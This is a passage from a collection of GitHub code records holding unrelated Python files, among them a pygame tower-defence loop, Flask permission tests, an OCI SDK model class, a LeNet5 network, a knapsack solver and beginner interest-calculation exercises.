-1\\n')\n plt_file.close()\n\n dat_file = open(dat_filepath, 'w')\n for size in sizes:\n dat_file.write('{0:4d} {1:8f} {2:8f}\\n'.format(size, times[size][ARC4], times[size][MyARC4]))\n dat_file.close()\n\ndef draw():\n subprocess.call(['gnuplot', plt_filepath])\n\nmeasure()\nwrite()\ndraw()\n","repo_name":"student-tomasz/odas-laboratorium-4","sub_path":"times.py","file_name":"times.py","file_ext":"py","file_size_in_byte":1467,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"35006243656","text":"import matplotlib.pyplot as plt\nimport pickle\n\nfrom prg_get import fromLine\nfrom prg_get import prg_get\n\nt_stplst, epilst, stplst, rewlst, count = fromLine()\n\ndone = False\navgs = []\nspacing = 100\nplt_lst = rewlst\nwhile not done:\n total = 0\n n = 0\n for i in range(spacing):\n try:\n total += plt_lst.pop(0)\n n += 1\n except:\n done = True\n if n > 0:\n avgs.append(total/n)\n\nplt.plot(avgs)\n# plt.axis([0,50,100,180])\n# plt.xticks([0,5,10,15,20])\nplt.show()\n","repo_name":"hadrien-pouget/Deep-Q-Learning","sub_path":"src/data/utils/plot_prg.py","file_name":"plot_prg.py","file_ext":"py","file_size_in_byte":516,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"31587275089","text":"from oci.util import formatted_flat_dict, NONE_SENTINEL, value_allowed_none_or_none_sentinel # noqa: F401\nfrom oci.decorators import init_model_state_from_kwargs\n\n\n@init_model_state_from_kwargs\nclass ExternalListenerEndpoint(object):\n \"\"\"\n The protocol address that an external listener is configured to listen on.\n \"\"\"\n\n #: A constant which can be used with the protocol property of a ExternalListenerEndpoint.\n #: This constant has a value of \"IPC\"\n PROTOCOL_IPC = \"IPC\"\n\n #: A 
constant which can be used with the protocol property of a ExternalListenerEndpoint.\n #: This constant has a value of \"TCP\"\n PROTOCOL_TCP = \"TCP\"\n\n #: A constant which can be used with the protocol property of a ExternalListenerEndpoint.\n #: This constant has a value of \"TCPS\"\n PROTOCOL_TCPS = \"TCPS\"\n\n def __init__(self, **kwargs):\n \"\"\"\n Initializes a new ExternalListenerEndpoint object with values from keyword arguments. This class has the following subclasses and if you are using this class as input\n to a service operations then you should favor using a subclass over the base class:\n\n * :class:`~oci.database_management.models.ExternalListenerTcpEndpoint`\n * :class:`~oci.database_management.models.ExternalListenerTcpsEndpoint`\n * :class:`~oci.database_management.models.ExternalListenerIpcEndpoint`\n\n The following keyword arguments are supported (corresponding to the getters/setters of this class):\n\n :param protocol:\n The value to assign to the protocol property of this ExternalListenerEndpoint.\n Allowed values for this property are: \"IPC\", \"TCP\", \"TCPS\", 'UNKNOWN_ENUM_VALUE'.\n Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'.\n :type protocol: str\n\n :param services:\n The value to assign to the services property of this ExternalListenerEndpoint.\n :type services: list[str]\n\n \"\"\"\n self.swagger_types = {\n 'protocol': 'str',\n 'services': 'list[str]'\n }\n\n self.attribute_map = {\n 'protocol': 'protocol',\n 'services': 'services'\n }\n\n self._protocol = None\n self._services = None\n\n @staticmethod\n def get_subtype(object_dictionary):\n \"\"\"\n Given the hash representation of a subtype of this class,\n use the info in the hash to return the class of the subtype.\n \"\"\"\n type = object_dictionary['protocol']\n\n if type == 'TCP':\n return 'ExternalListenerTcpEndpoint'\n\n if type == 'TCPS':\n return 'ExternalListenerTcpsEndpoint'\n\n if type == 'IPC':\n return 'ExternalListenerIpcEndpoint'\n else:\n return 'ExternalListenerEndpoint'\n\n @property\n def protocol(self):\n \"\"\"\n **[Required]** Gets the protocol of this ExternalListenerEndpoint.\n The listener protocol.\n\n Allowed values for this property are: \"IPC\", \"TCP\", \"TCPS\", 'UNKNOWN_ENUM_VALUE'.\n Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'.\n\n\n :return: The protocol of this ExternalListenerEndpoint.\n :rtype: str\n \"\"\"\n return self._protocol\n\n @protocol.setter\n def protocol(self, protocol):\n \"\"\"\n Sets the protocol of this ExternalListenerEndpoint.\n The listener protocol.\n\n\n :param protocol: The protocol of this ExternalListenerEndpoint.\n :type: str\n \"\"\"\n allowed_values = [\"IPC\", \"TCP\", \"TCPS\"]\n if not value_allowed_none_or_none_sentinel(protocol, allowed_values):\n protocol = 'UNKNOWN_ENUM_VALUE'\n self._protocol = protocol\n\n @property\n def services(self):\n \"\"\"\n Gets the services of this ExternalListenerEndpoint.\n The list of services registered with the listener.\n\n\n :return: The services of this ExternalListenerEndpoint.\n :rtype: list[str]\n \"\"\"\n return self._services\n\n @services.setter\n def services(self, services):\n \"\"\"\n Sets the services of this ExternalListenerEndpoint.\n The list of services registered with the listener.\n\n\n :param services: The services of this ExternalListenerEndpoint.\n :type: list[str]\n \"\"\"\n self._services = services\n\n def __repr__(self):\n return formatted_flat_dict(self)\n\n def __eq__(self, other):\n if 
other is None:\n return False\n\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n return not self == other\n","repo_name":"oracle/oci-python-sdk","sub_path":"src/oci/database_management/models/external_listener_endpoint.py","file_name":"external_listener_endpoint.py","file_ext":"py","file_size_in_byte":4649,"program_lang":"python","lang":"en","doc_type":"code","stars":345,"dataset":"github-code","pt":"52"} +{"seq_id":"40406453714","text":"def selection_sort(string):\n array = list(string.lower())\n n = len(array)\n for i in range(n):\n min_element_index = i\n for j in range(i+1, n):\n if array[j] < array[min_element_index]:\n min_element_index = j\n array[i], array[min_element_index] = array[min_element_index], array[i]\n return ''.join(array)\n\n\ndef is_anagram(first_string, second_string):\n if not first_string and not second_string:\n return (\"\", \"\", False)\n\n sorted_first = selection_sort(first_string)\n sorted_second = selection_sort(second_string)\n\n boolean = sorted_first == sorted_second\n\n return (\n sorted_first,\n sorted_second,\n boolean\n )\n","repo_name":"DenisDaros/Algorithms","sub_path":"challenges/challenge_anagrams.py","file_name":"challenge_anagrams.py","file_ext":"py","file_size_in_byte":711,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"13982505709","text":"from typing import Generator\nfrom uuid import NAMESPACE_DNS, UUID, uuid3, uuid4\n\n\nclass User:\n def __init__(self, id_: UUID, name: str) -> None:\n self.id_: UUID = id_\n self.name: str = name\n\n def __str__(self) -> str:\n return f\"uuid4:\\n{self.id_}, {self.name}\"\n\n\njohn = User(id_=uuid4(), name=\"John\")\nmary = User(id_=uuid4(), name=\"Mary\")\n\nprint(john)\nprint(mary)\n\n\n# _____________________________________________________________________________________________________________________\n\n\ndef get_id(value: str) -> UUID:\n return uuid3(NAMESPACE_DNS, value)\n\n\nclass User1:\n def __init__(self, username: str) -> None:\n self.id_: UUID = get_id(username)\n self.username: str = username\n\n def __str__(self) -> str:\n return f\"uuid3:\\n{self.id_}, {self.username}\"\n\n\njohn1 = User1(username=\"John\")\nmary1 = User1(username=\"Mary\")\nanother_john = User1(username=\"John\")\n\nprint(john1)\nprint(mary1)\nprint(another_john)\n\n\n# _____________________________________________________________________________________________________________________\n\n\ndef create_random_uuid() -> Generator:\n data = set()\n while True:\n new_value: UUID = uuid4()\n if new_value in data:\n continue\n else:\n data.add(new_value)\n yield new_value\n\n\nrandom_uuid: Generator = create_random_uuid()\n\n\nclass User2:\n def __init__(self, username: str) -> None:\n self.id_: UUID = next(random_uuid)\n self.username: str = username\n\n def __str__(self) -> str:\n return f\"uuid4 generator:\\n{self.id_}, {self.username}\"\n\n\njohn2 = User2(username=\"John\")\nmary2 = User2(username=\"Mary\")\nanother_john2 = User2(username=\"John\")\n\nprint(john2)\nprint(mary2)\nprint(another_john2)\n","repo_name":"OlegKhripliviy/hillel_17_10","sub_path":"lesson_04/01.py","file_name":"01.py","file_ext":"py","file_size_in_byte":1750,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"7811274491","text":"# coding=utf-8\n\nimport pygame\nimport grille_classe\nimport unite_classe\nimport joueur_classe\nimport ig_menu_classe\nimport regles_classe\nimport fin_jeu\nimport os\nimport 
HUD\nimport IA\n\nclass Game:\n\tdef __init__(self):\n\t\tself.paused=False\n\n\t\t# Set the width and height of the screen [width, height]\n\t\tself.screen_width = 1410\n\t\tself.screen_height = 910\n\t\tos.environ['SDL_VIDEO_CENTERED'] = '1'\n\n\tdef launch(self,diff):\n\t\tprint('Launching game ...')\n\n\t\tself.screen = pygame.display.set_mode([self.screen_width, self.screen_height])\n\t\tpygame.display.set_caption(\"Road to Mordor\")\n\t\tself.clock = pygame.time.Clock()\n\n\t\tself.joueur = joueur_classe.Joueur(\"Player 1\",\"humain\",1)\n\t\tself.joueurIA = joueur_classe.Joueur(\"Computer\",\"orc\",0)\n\t\tself.hud = HUD.UserInterface(self.screen,self.joueur,self.joueurIA)\n\t\tself.grille = grille_classe.Grille(16,20,diff,self.screen.subsurface((205,50,1000,800)),self.hud,self.joueurIA,self.joueur)\n\t\tself.IA = IA.IA(self.grille,self.joueurIA)\n\t\tself.ig_menu = ig_menu_classe.InGameMenu(self.screen)\n\t\tself.rules = regles_classe.Regles(self.screen)\n\t\tself.game_over = fin_jeu.Fin(self.screen)\n\n\t\tpygame.mixer.music.load('Musique/Musiquedefond.mp3')\n\t\tpygame.mixer.music.play(-1)\n\n\t\tturn=0\n\t\tdone = False\n\t\tshow_regles = False\n\t\tshow_gameOver=False\n\t\t# -------- Main Program Loop -----------\n\t\tkeys_pressed = dict()\n\t\tpygame.event.Event(pygame.USEREVENT,{'key':0,'unicode':''})\n\t\twhile not done:\n\t\t\tturn+=1\n \t# --- Main event loop\n\t\t\tfor event in pygame.event.get():\n #print('EVENT ', pygame.event.event_name(event.type))\n\t\t\t\tif event.type == pygame.QUIT:\n\t\t\t\t\tprint('Ending game ... and QUIT !')\n\t\t\t\t\treturn False\n\t\t\t\telif event.type == pygame.KEYDOWN:\n #keys_pressed[event.key] = {'key': event.key, 'unicode': event.unicode} # Create KEYPRESS events\n\t\t\t\t\tif len(keys_pressed)>0:\n\t\t\t\t\t\tpygame.time.set_timer(pygame.USEREVENT,150)\n\t\t\t\t\tif self.paused:\n\t\t\t\t\t\tif show_regles:\n\t\t\t\t\t\t\tshow_regles=False\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tif event.key == pygame.K_RETURN:\n\t\t\t\t\t\t\t\tres_m = self.ig_menu.getSelected()\n\t\t\t\t\t\t\t\tif res_m == 0:\n\t\t\t\t\t\t\t\t\tpygame.mixer.music.unpause()\n\t\t\t\t\t\t\t\t\tself.paused=False\n\t\t\t\t\t\t\t\telif res_m == 1:\n\t\t\t\t\t\t\t\t\tshow_regles=True\n\t\t\t\t\t\t\t\telif res_m == 2:\n\t\t\t\t\t\t\t\t\tself.paused=False\n\t\t\t\t\t\t\t\t\tprint('Ending game ...')\n\t\t\t\t\t\t\t\t\treturn True\n\t\t\t\t\t\t\telif event.key == pygame.K_ESCAPE:\n\t\t\t\t\t\t\t\tself.paused=False\n\t\t\t\t\t\t\t\tpygame.mixer.music.unpause()\n\t\t\t\t\t\t\telif event.key == pygame.K_LEFT:\n\t\t\t\t\t\t\t\tself.ig_menu.selectPrev()\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tself.ig_menu.switchSelected()\n\t\t\t\t\telif show_gameOver:\n\t\t\t\t\t\tprint('Ending game ...')\n\t\t\t\t\t\tself.game_over.stop()\n\t\t\t\t\t\treturn True\n\t\t\t\t\telse:\n\t # Handle KEYDOWN\n\t\t\t\t\t\tif event.unicode == 'd':\n\t\t\t\t\t\t\tself.hud.selectNext()\n\t\t\t\t\t\telif event.unicode == 'q': # Q sur un Azerty\n\t\t\t\t\t\t\tself.hud.selectPrev()\n\t\t\t\t\t\telif event.unicode == 'a': # A sur un Azerty\n\t\t\t\t\t\t\tself.hud.switchMode()\n\t\t\t\t\t\telif event.unicode == '-':\n\t\t\t\t\t\t\tprint('- HEY !')\n\t\t\t\t\t\telif event.unicode == '.':\n\t\t\t\t\t\t\tself.joueurIA.setVieChateau(0)\n\t\t\t\t\t\telif event.key == pygame.K_ESCAPE:\n\t\t\t\t\t\t\tself.paused = True\n\t\t\t\t\t\t\tpygame.mixer.music.pause()\n\t\t\t\t\t\telif event.key == pygame.K_UP:\n\t\t\t\t\t\t\tself.grille.selectUp()\n\t\t\t\t\t\telif event.key == 
pygame.K_DOWN:\n\t\t\t\t\t\t\tself.grille.selectDown()\n\t\t\t\t\t\telif event.key == pygame.K_LEFT:\n\t\t\t\t\t\t\tself.grille.selectLeft()\n\t\t\t\t\t\telif event.key == pygame.K_RIGHT:\n\t\t\t\t\t\t\tself.grille.selectRight()\n\t\t\t\t\t\telif event.key == pygame.K_RETURN:\n\t\t\t\t\t\t\tif self.hud.canUse():\n\t\t\t\t\t\t\t\tif self.hud.getMode()=='towers':\n\t\t\t\t\t\t\t\t\tif self.grille.canBuild(self.grille.getSelected(),self.joueur.getEquipe()):\n\t\t\t\t\t\t\t\t\t\ttour = self.joueur.createBuild(self.hud.getSelected(),self.grille,self.grille.getSelected())\n\t\t\t\t\t\t\t\t\t\tif tour == False:\n\t\t\t\t\t\t\t\t\t\t\tself.hud.showMessage(\"Argent insuffisant ...\",70)\n\t\t\t\t\t\t\t\t\t\t\tprint('Argent insuffisant')\n\t\t\t\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t\t\t\tself.grille.place(tour)\n\t\t\t\t\t\t\t\t\t\t\tself.hud.use()\n\t\t\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t\t\tself.hud.showMessage(\"Placement impossible !\",70)\n\t\t\t\t\t\t\t\t\t\tprint('Placement impossible')\n\t\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t\tif self.grille.canSpawn(self.grille.getRoute(),self.joueur.getEquipe()):\n\t\t\t\t\t\t\t\t\t\tunit = self.joueur.createUnit(self.hud.getSelected(),self.grille,self.grille.getRoute())\n\t\t\t\t\t\t\t\t\t\tif unit == False:\n\t\t\t\t\t\t\t\t\t\t\tself.hud.showMessage(\"Argent insuffisant ...\",70)\n\t\t\t\t\t\t\t\t\t\t\tprint('Argent insuffisant')\n\t\t\t\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t\t\t\tself.grille.place(unit)\n\t\t\t\t\t\t\t\t\t\t\tself.hud.use()\n\t\t\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t\t\tself.hud.showMessage(\"Placement impossible !\",70)\n\t\t\t\t\t\t\t\t\t\tprint('Placement impossible')\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tself.hud.showMessage(\"Cooldown en cours.\",70)\n\t\t\t\t\t\t\t\tprint('Cooldown en cours')\n\t\t\t\t\"\"\"\n\t\t\t\telif event.type == pygame.KEYUP:\n\t\t\t\t\tkeys_pressed.pop(event.key) # Create KEYPRESS events\n\t\t\t\t\tif len(keys_pressed)<=0:\n\t\t\t\t\t\tpygame.time.set_timer(pygame.USEREVENT,0) # Remove timer\n\t\t\t\telif event.type == pygame.USEREVENT:\n\t\t\t\t\tfor key,item in keys_pressed.iteritems():\n\t\t\t\t\t\tif key == pygame.K_UP:\n\t\t\t\t\t\t\tself.grille.selectUp()\n\t\t\t\t\t\telif key == pygame.K_DOWN:\n\t\t\t\t\t\t\tself.grille.selectDown()\n\t\t\t\t\t\telif key == pygame.K_LEFT:\n\t\t\t\t\t\t\tself.grille.selectLeft()\n\t\t\t\t\t\telif key == pygame.K_RIGHT:\n\t\t\t\t\t\t\tself.grille.selectRight()\n\t\t\t\t\"\"\"\n\t\t\t# --- Game logic should go here\n\t\t\t#pygame.display.update()\n\t\t\tself.screen.fill((75,75,75))\n\t\t\tif self.paused:\n\t\t\t\tif show_regles:\n\t\t\t\t\tself.rules.draw()\n\t\t\t\telse:\n\t\t\t\t\tself.ig_menu.draw()\n\t\t\telif show_gameOver:\n\t\t\t\tself.game_over.draw()\n\t\t\telse:\n\t\t\t\tself.grille.draw()\n\t\t\t\tself.hud.draw()\n\t\t\t\tif turn%300==0:\n\t\t\t\t\tself.joueur.recevoirArgent(100)\n\t\t\t\t\tself.joueurIA.recevoirArgent(100)\n\t\t\t\tif turn%5==0:\n\t\t\t\t\tself.IA.play()\n\t\t\t\tif turn%10==0:\n\t\t\t\t\tself.grille.play()\n\t\t\t# --- Check if the game is over\n\t\t\tif self.joueur.getVieChateau()==0 and not show_gameOver:\n\t\t\t\tshow_gameOver = True\n\t\t\t\tpygame.mixer.music.stop()\n\t\t\t\tself.game_over.start(False)\n\t\t\telif self.joueurIA.getVieChateau()==0 and not show_gameOver:\n\t\t\t\tshow_gameOver = True\n\t\t\t\tpygame.mixer.music.stop()\n\t\t\t\tself.game_over.start(True)\n\n\t\t\t# --- Go ahead and update the screen with what we've drawn.\n\t\t\tpygame.display.flip()\n\n\t\t\t# --- Limit to 60 frames per 
second\n\t\t\tself.clock.tick(60)\n\n\t\t# Close the window and quit.\n\n\t\tprint('Ending game ...')\n\n\t\treturn True\n","repo_name":"Ivan-Roger/RoadToMordor","sub_path":"game_classe.py","file_name":"game_classe.py","file_ext":"py","file_size_in_byte":6227,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"8503637269","text":"# coding=utf-8\nfrom flask.ext.testing import TestCase\nfrom nose.tools import assert_equal\n\nfrom aireadManager.main import app\nfrom aireadManager.model import db\nfrom aireadManager.model.group_permission import GroupPermissionModel\nfrom aireadManager.test.init_te_st_db import TestDBConfig\nfrom aireadManager.utils.errors import Code\nfrom aireadManager.utils.permissions import Roles\nfrom aireadManager.utils.principal import role_set\n\n\n__author__ = 'airead'\n\nSuccessRet = {\n 'code': Code.SUCCESS\n}\n\nGroupPerm1 = {\n 'group_id': 1,\n 'permission_id': 2\n}\n\nGroupPerm2 = {\n 'group_id': 2,\n 'permission_id': 1\n}\n\n\nclass Test_GroupPermissions(TestCase):\n def create_app(self):\n app.config.from_object(TestDBConfig)\n return app\n\n def setUp(self):\n db.drop_all()\n db.create_all()\n group1 = GroupPermissionModel(**GroupPerm1)\n group2 = GroupPermissionModel(**GroupPerm2)\n db.session.add(group1)\n db.session.add(group2)\n db.session.commit()\n\n def tearDown(self):\n db.session.remove()\n\n def test_groups_get(self):\n rv = self.client.get('/group_permissions/')\n group1, group2 = rv.json\n assert_equal(group1['permission_id'], GroupPerm1['permission_id'])\n assert_equal(group1['group_id'], GroupPerm1['group_id'])\n assert_equal(group2['permission_id'], GroupPerm2['permission_id'])\n assert_equal(group2['group_id'], GroupPerm2['group_id'])\n\n def test_groups_post(self):\n data = {\n 'group_id': 2,\n 'permission_id': 2\n }\n\n rv = self.client.post('group_permissions/', data=data)\n self.assert403(rv)\n\n with role_set(Roles.admin):\n rv = self.client.post('group_permissions/', data=data)\n assert_equal(rv.json['uri'], '/group_permissions/3')\n\n groups = db.session.query(GroupPermissionModel).all()\n assert_equal(len(groups), 3)\n\n def test_group_put(self):\n data = {\n 'permission_id': 1\n }\n rv = self.client.post('group_permissions/1?at=put', data=data)\n self.assert403(rv)\n\n with role_set(Roles.admin):\n rv = self.client.post('group_permissions/1?at=put', data=data)\n assert_equal(rv.json, SuccessRet)\n\n group = db.session.query(GroupPermissionModel).filter_by(id=1).one()\n assert_equal(group.permission_id, 1)\n\n def test_group_delete(self):\n rv = self.client.post('group_permissions/1?at=delete')\n self.assert403(rv)\n\n with role_set(Roles.admin):\n rv = self.client.post('group_permissions/1?at=delete')\n assert_equal(rv.json, SuccessRet)\n\n groups = db.session.query(GroupPermissionModel).all()\n assert_equal(len(groups), 1)\n group = groups[0]\n assert_equal(group.permission_id, GroupPerm2['permission_id'])\n\n def test_group_get(self):\n rv = self.client.get('/group_permissions/1')\n assert_equal(rv.json['permission_id'], GroupPerm1['permission_id'])\n assert_equal(rv.json['group_id'], GroupPerm1['group_id'])\n","repo_name":"Airead/airead-manager","sub_path":"aireadManager/test/test_group_permissions.py","file_name":"test_group_permissions.py","file_ext":"py","file_size_in_byte":3095,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"25394943601","text":"#ex_cap5_pag90\n#ex5.11 Escreva um programa que pergunte o 
depósito inicial e a taxa de juros de uma poupança. Exiba os valores mês a mês para os 24 primeiros meses. Escreva o total ganho com juros no período.\ndeposito = float(input(\"Depósito inicial: \"))\njuros = float(input(\"taxa de juros: \"))\nmes = 1\nsaldo = deposito\n\nwhile mes <= 24:\n    saldo = saldo + (saldo * (juros/100))\n    print(f\"Saldo do mês {mes} é de R${saldo:5.2f}.\")\n    mes = mes + 1\nprint(f\"ao final de todos os meses, os juros em conta são de R${saldo-deposito:5.2f}.\")\n\n\n\n#ex5.12 Altere o programa anterior de forma a perguntar também o valor depositado mensalmente. Esse valor será depositado no início de cada mês, e você deve considerá-lo para o cálculo de juros do mês seguinte.\n\ndeposito = float(input(\"Depósito inicial: \"))\njuros = float(input(\"taxa de juros: \"))\ndeposito_mensal = float(input(\"Depósito mensal: \"))\nmes = 1\nsaldo = deposito\n\nwhile mes <= 24:\n    saldo = saldo + (saldo * (juros/100)) + deposito_mensal\n    print(f\"Saldo do mês {mes} é de R${saldo:5.2f}.\")\n    mes = mes + 1\nprint(f\"ao final de todos os meses, os juros em conta são de R${saldo-deposito:5.2f}.\")\n\n#ex5.13 Escreva um programa que pergunte o valor inicial de uma dívida e o juros mensal. Pergunte também o valor mensal que será pago. Imprima o número de meses para que a dívida seja paga, o total pago e o total de juros pago.\ndivida = float(input(\"valor inicial da dívida: \"))\ntaxa = float(input(\"taxa de juros mensal: \"))\npagto_mensal = float(input(\"pagamento mensal no valor de R$: \"))\nmes = 1\nif (divida * (taxa/100) > pagto_mensal):\n    print(\"Escolha outro valor de pagamento, pois os juros são superiores ao pagamento mensal.\")\n\nelse:\n    saldo = divida\n    juros_pago = 0\n    while saldo > pagto_mensal:\n        juros = saldo * taxa / 100\n        saldo = saldo + juros - pagto_mensal\n        juros_pago = juros_pago + juros\n        print(f\"Saldo da dívida no mês {mes} é de R${saldo:6.2f}.\")\n        mes = mes + 1\n    print(f\"Para pagar uma dívida de R${divida:8.2f}, a {taxa:5.2f} % de juros,\")\n    print(f\"você precisará de {mes - 1} meses, pagando um total de R${juros_pago:8.2f} de juros.\")\n    print(f\"No último mês, você teria um saldo residual de R${saldo:8.2f} a pagar.\")\n","repo_name":"GaybsGimenez/python_exercises","sub_path":"cap5/ex_cap5_pag90.py","file_name":"ex_cap5_pag90.py","file_ext":"py","file_size_in_byte":2261,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"11908128173","text":"from typing import List\n\ndef knapsack(weights: List[int], values: List[int], max_weight: int) -> int:\n    n = len(weights)\n    dp = [[0] * (max_weight + 1) for _ in range(n + 1)]\n\n    for i in range(max_weight + 1):\n        dp[0][i] = 0\n\n    for i in range(1, n + 1):\n        for j in range(max_weight + 1):\n            dp[i][j] = max(dp[i][j], (dp[i - 1][j - weights[i - 1]] + values[i - 1]) if j >= weights[i - 1] else 0, dp[i - 1][j]) \n\n    return dp[n][max_weight]\n\nif __name__ == '__main__':\n    weights = [int(x) for x in input().split()]\n    values = [int(x) for x in input().split()]\n    max_weight = int(input())\n    res = knapsack(weights, values, max_weight)\n    print(res)\n\n","repo_name":"yashanand1910/solutions","sub_path":"algomonster/dynamic-programming/0_1_knapsack_problem.py","file_name":"0_1_knapsack_problem.py","file_ext":"py","file_size_in_byte":686,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"}
{"seq_id":"21897464871","text":"import signed_utils as utils\nimport random as rd\nimport collections\n\n\nclass LabelPropagation:\n\n    def 
__init__(self, dataset: utils.Dataset, neighborhood):\n        \"\"\"\n        Label propagation algorithm.\n\n        :param dataset: the dataset to cluster\n        :param neighborhood: neighborhood structure (positive/negative neighbor sets per node)\n        \"\"\"\n        self._dataset = dataset\n        self.neighborhood = neighborhood\n\n    def label_propagation(self, max_iter=5, print_info=False):\n        \"\"\"\n        Generate an initial solution by label propagation.\n\n        :param print_info: whether to print the resulting solution and partition\n        :param max_iter: maximum number of iterations\n        :return: solution: dict, partition: dict(community: set())\n        \"\"\"\n\n        solution, __ = utils.standard_initialize(self._dataset.vnum)\n        changed = True\n        ct = 0\n\n        random_v = list(range(self._dataset.vnum))\n        rd.shuffle(random_v)\n\n        while changed and ct < max_iter:\n            ct += 1\n            changed = False\n\n            for node in random_v:\n\n                mcc = self.__most_common_community_label(node, current_solution=solution, node_neighborhood=self.neighborhood[node])\n                if changed is False and mcc != solution[node]:\n                    changed = True\n                solution[node] = mcc\n\n            # reform the solution and partition\n            partition = utils.solution2partition(solution)\n            partition = utils.reform_partition(partition)\n            solution = utils.partition2solution(partition, self._dataset.vnum)\n\n            if print_info:\n                print('Solution:', solution)\n                print('Partition:', partition)\n                print('Number of clusters:', len(partition))\n\n        return solution, partition\n\n    @staticmethod\n    def __most_common_community_label(node, current_solution, node_neighborhood):\n        \"\"\"\n        Find the most common community label among a node's neighbors.\n\n        :param node: node index\n        :return: the label with the highest score, counting +1 per positive neighbor and -1 per negative neighbor of that community\n        \"\"\"\n        pos_nbr, neg_nbr = node_neighborhood['+'], node_neighborhood['-']\n\n        label_num = collections.defaultdict(int)\n\n        for elem in pos_nbr:\n            label_num[current_solution[elem]] += 1\n        for elem in neg_nbr:\n            label_num[current_solution[elem]] -= 1\n\n        if label_num:\n            return max(label_num, key=label_num.get)\n        else:\n            return current_solution[node]","repo_name":"Mcdhcnhk0o0/structural_balance","sub_path":"label_propagation_algorithm.py","file_name":"label_propagation_algorithm.py","file_ext":"py","file_size_in_byte":2378,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"448421512","text":"# Lab 4 task 10\n\nimport numpy as np\n\ntry:\n    data = np.genfromtxt('bikeSharing.csv', dtype=float, delimiter=',')\n\n    new_data = np.delete(data, 0, axis=1)\n\n    np.savetxt(\"minusFirstColumnBike.csv\", new_data, delimiter=',', fmt='%.2f')\n\n\nexcept IOError:\n    print(\"Couldn't find the file\")\n","repo_name":"TomaszNowakDev/Programming_for_data_analytics","sub_path":"lab4/task10.py","file_name":"task10.py","file_ext":"py","file_size_in_byte":292,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"69847681445","text":"from PIL import Image\n\n# Leitura da imagem\nimg = Image.open('Images/imagem.jpg')\n\n# Separação dos canais RGB\nr, g, b = img.split()\n\n# Exibição de cada canal separadamente\nr.show()\ng.show()\nb.show()","repo_name":"FelipeFerreiraDev/Computer-Graphics","sub_path":"Tratamentos básicos/separação_de_canais.py","file_name":"separação_de_canais.py","file_ext":"py","file_size_in_byte":201,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"6130118640","text":"import torch\nfrom torch import nn\nfrom torch.nn import functional as F\n\n\nclass Lenet5(nn.Module):\n    def __init__(self):\n        super(Lenet5, self).__init__()\n        # convolution layers\n        self.conv_unit = nn.Sequential(\n            # x[batch_size,3,32,32]=>[batch_size,6,28,28]\n            # convolution\n            nn.Conv2d(3, 6, kernel_size=5, stride=1, padding=0),\n            # pooling\n            nn.AvgPool2d(kernel_size=2, stride=2, padding=0),\n            
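# second convolution + pooling stage (6 -> 16 feature maps)\n            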
nn.Conv2d(6, 16, kernel_size=5, stride=1, padding=0),\n            nn.AvgPool2d(kernel_size=2, stride=2, padding=0)\n        )\n\n        # flatten\n        # fully connected layers\n        self.fc_unit = nn.Sequential(\n            nn.Linear(16 * 5 * 5, 120),\n            nn.ReLU(),\n            nn.Linear(120, 84),\n            nn.ReLU(),\n            nn.Linear(84, 10)\n        )\n\n    def forward(self, x):\n        batch_size = x.size(0)\n        # x[b,3,32,32]==>[b,16,5,5]\n        # convolution first\n        x = self.conv_unit(x)\n        # flatten\n        x = x.view(batch_size, 16 * 5 * 5)\n        # fully connected\n        logits = self.fc_unit(x)\n\n        return logits\n\n\n","repo_name":"iamjustarookie/DeepLearning","sub_path":"lenet5/lenet.py","file_name":"lenet.py","file_ext":"py","file_size_in_byte":1100,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"21937857735","text":"#!/usr/bin/env python\nfrom __future__ import print_function\nfrom __future__ import absolute_import\n__author__ = 'Tony Beltramelli - www.tonybeltramelli.com'\n\nimport os\nimport sys\nimport shutil\n\nfrom classes.Utils import *\nfrom classes.model.Config import *\n\nargv = sys.argv[1:]\n\nif len(argv) < 2:\n    print(\"Error: not enough argument supplied:\")\n    print(\"convert_imgs_to_arrays.py \")\n    exit(0)\nelse:\n    input_path = argv[0]\n    output_path = argv[1]\n\nif not os.path.exists(output_path):\n    os.makedirs(output_path)\n\nprint(\"Converting images to numpy arrays...\")\n\nfor f in os.listdir(input_path):\n    if f.find(\".png\") != -1:\n        img = Utils.get_preprocessed_img(\"{}/{}\".format(input_path, f), IMAGE_SIZE)\n        file_name = f[:f.find(\".png\")]\n\n        np.savez_compressed(\"{}/{}\".format(output_path, file_name), features=img)\n        retrieve = np.load(\"{}/{}.npz\".format(output_path, file_name))[\"features\"]\n\n        assert np.array_equal(img, retrieve)\n\n        shutil.copyfile(\"{}/{}.gui\".format(input_path, file_name), \"{}/{}.gui\".format(output_path, file_name))\n\nprint(\"Numpy arrays saved in 